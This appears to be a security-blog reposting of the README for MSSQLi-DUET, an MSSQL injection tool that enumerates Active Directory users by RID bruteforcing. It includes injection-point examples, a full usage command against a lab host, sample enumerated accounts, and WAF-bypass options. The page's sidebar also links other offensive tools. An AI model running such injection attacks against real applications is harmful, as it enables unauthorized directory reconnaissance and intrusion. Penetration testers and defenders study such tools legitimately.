MSSQLi-DUET : MSSQL Injection-based Domain User Enumeration Tool

SQL injection script for MSSQL that extracts domain users from an Active Directory environment based on RID bruteforcing. Supports various forms of WAF bypass techniques through the implementation of SQLmap tamper functions. Additional tamper functions can be incorporated by the user depending on the situation and environment.

Comes in two flavors: straight-up Python script for terminal use, or a Burp Suite plugin for simple GUI navigation.

Currently only supports union-based injection at the moment. More samples and test cases are required to fully test tool’s functionality and accuracy. Feedback and comments are greatly welcomed if you encounter a situation it does not work.

Custom tailoring the script and plugin to your needs should not be too difficult as well. Be sure to read the Notes section for some troubleshooting.

Burp Suite Plugin

After loading the plugin into Burp Suite, right-click on a request and send it to MSSQLi-DUET. More details on the parameters and such are described below.

The request will populate in the request window, and only the fields above it need to be filled out. After hitting run the output will be placed in the results output box for easy copy pasting.

Python Script Usage

Script Help

Python3 mssqli-duet.py -h

Usage: mssqli-duet.py [-h] -i INJECTION [-e ENCODING] -t TIME_DELAY -rid
RID_RANGE [-ssl SSL] -p PARAMETER [-proxy PROXY]
[-o OUTFILE] -r REQUEST_FILE
MSSQLi-DUET – MSSQL (Injection-based) Domain User Enumeration Tool

Optional Arguments:
-h, –help show this help message and exit
-i INJECTION, –injection INJECTION Injection point. Provide only the data needed to escape the query.
-e ENCODING, –encoding ENCODING Type of encoding: unicode, doubleencode, unmagicquotes
-t TIME_DELAY, –time_delay TIME_DELAY Time delay for requests.
-rid RID_RANGE, –rid_range RID_RANGE Hypenated range of RIDs to bruteforce. Ex: 1000-1200
-ssl SSL, –ssl SSL Add flag for HTTPS -p PARAMETER, –parameter PARAMETER Vulnerable parameter
-proxy PROXY, –proxy PROXY Proxy connection string. Ex: 127.0.0.1:8080
-o OUTFILE, –outfile OUTFILE Outfile for username enumeration results.
-r REQUEST_FILE, –request_file REQUEST_FILE Raw request file saved from Burp

Prepare to be enumerated!

How to use?

After identifying a union-based SQL injection in an application, copy the raw request from Burp Suite using the ‘copy to file’ feature.

Pass the saved request to DUET with the -r flag. Specify the vulnerable parameter and well as the point of injection. As an example, if the parameter “element” is susceptible to SQL injection, -p will be “element”. DUET will build out all the SQL injection queries automatically, but specification for the initial injection needs to be provided. Meaning, if the injection occurs because of a single apostrophe after the parameter data, this is what would be specified for the -i argument.

Ex: test’
test’))
test”)”

Also Read – R00kie-Kr00kie : PoC Exploit For The CVE-2019-15126 Kr00k Vulnerability

Example

Python3 mssqli-duet.py -i “carbon'” -t 0 -rid 1000-1200 -p element -r testrequest.req -proxy 127.0.0.1:8080

Collected request data:
Target URL = http://192.168.11.22/search2.php?element=carbon
Method = GET
Content-Type = applcation/x-www-form-urlencoded

[+]Determining the number of columns in the table…
[!]Number of columns is 3
[+]Determining column type…
[!]Column type is null
[+]Discovering domain name…
[!]Domain = NEUTRINO
[+]Discovering domain SID…
S-1-5-21-4142252318-1896537706-4233180933-
[+]Enumerating Active Directory via SIDs…

NEUTRINO\HYDROGENDC01$
NEUTRINO\DnsAdmins
NEUTRINO\DnsUpdateProxy
NEUTRINO\HELIUM$
NEUTRINO\BORON$
NEUTRINO\BERYLLIUM$
NEUTRINO\aeinstein
NEUTRINO\bbobberson
NEUTRINO\csagan
NEUTRINO\ccheese
NEUTRINO\svc_web
NEUTRINO\svc_sql

Notes

The script may need to be modified depending on the casting and type limitations of the columns that are discovered.
This includes modifications to switch the column position of the payload, and also modifying the query strings themselves to account for column types that will not generate errors.

Additionally, the logic for determining the number of columns is currently not the greatest, and certain comparisons maybe need to be commented out to ensure proper determination takes place.

Overall, just take a look at the requests being sent in Burp and tailor the script as necessary to the SQL injection environment you find yourself in.

Download
R K

Share
Published by
R K
Tags: MSSQLMSSQLiMSSQLi-DUETsql
5 years ago

Recent Posts

Shadow-rs : Harnessing Rust’s Power For Kernel-Level Security Research

shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…

1 week ago

ExecutePeFromPngViaLNK – Advanced Execution Of Embedded PE Files via PNG And LNK

Extract and execute a PE embedded within a PNG file using an LNK file. The…

2 weeks ago

Red Team Certification – A Comprehensive Guide To Advancing In Cybersecurity Operations

Embark on the journey of becoming a certified Red Team professional with our definitive guide.…

3 weeks ago

CVE-2024-5836 / CVE-2024-6778 : Chromium Sandbox Escape via Extension Exploits

This repository contains proof of concept exploits for CVE-2024-5836 and CVE-2024-6778, which are vulnerabilities within…

3 weeks ago

Rust BOFs – Unlocking New Potentials In Cobalt Strike

This took me like 4 days (+2 days for an update), but I got it…

3 weeks ago

MaLDAPtive – Pioneering LDAP SearchFilter Parsing And Security Framework

MaLDAPtive is a framework for LDAP SearchFilter parsing, obfuscation, deobfuscation and detection. Its foundation is…

3 weeks ago